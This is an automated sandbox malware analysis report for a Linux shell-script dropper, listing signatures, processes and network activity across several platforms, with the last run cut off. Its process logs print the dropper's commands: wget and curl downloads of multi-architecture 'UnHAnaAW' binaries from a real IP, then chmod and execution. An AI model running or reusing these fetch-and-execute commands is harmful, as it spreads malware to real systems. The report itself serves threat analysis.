Malware Analysis Report

2025-05-06 03:39

Sample ID 241124-bpwmhaspck
Target 513641f5f60d55559c2060489de6d605.bin
SHA256 979ed6b90ceebe0bc4b8d4d4ac67f359d12fddf2fc5d837421a114f5db247093
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

979ed6b90ceebe0bc4b8d4d4ac67f359d12fddf2fc5d837421a114f5db247093

Threat Level: Shows suspicious behavior

The file 513641f5f60d55559c2060489de6d605.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 01:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

25s

Max time network

128s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/3AvA N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA config-err-8gizQM netplan_nx60yubt snap-private-tmp ssh-gFgSF6yUeohG systemd-private-03b4c04fee744f448dbe6b90fbfc939a-bolt.service-HuT1Fx systemd-private-03b4c04fee744f448dbe6b90fbfc939a-colord.service-pqJ9gC systemd-private-03b4c04fee744f448dbe6b90fbfc939a-ModemManager.service-vtZNyX systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-resolved.service-3jQMbb systemd-private-03b4c04fee744f448dbe6b90fbfc939a-systemd-timedated.service-snrQM4]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 89.22.230.162:80 tcp
N/A 224.0.0.251:5353 udp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
US 151.101.1.91:443 tcp
NL 89.22.230.162:80 tcp
GB 195.181.164.15:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

debian9-armhf-20240611-en

Max time kernel

26s

Max time network

64s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp

Files

memory/818-1-0xb676f000-0xb6780044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

debian9-mipsbe-20240611-en

Max time kernel

69s

Max time network

72s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-8208d2d626f641dc809053c14c69dd47-systemd-timedated.service-eoiSMk]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 01:19

Reported

2024-11-24 01:22

Platform

debian9-mipsel-20240226-en

Max time kernel

79s

Max time network

83s

Command Line

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

Signatures

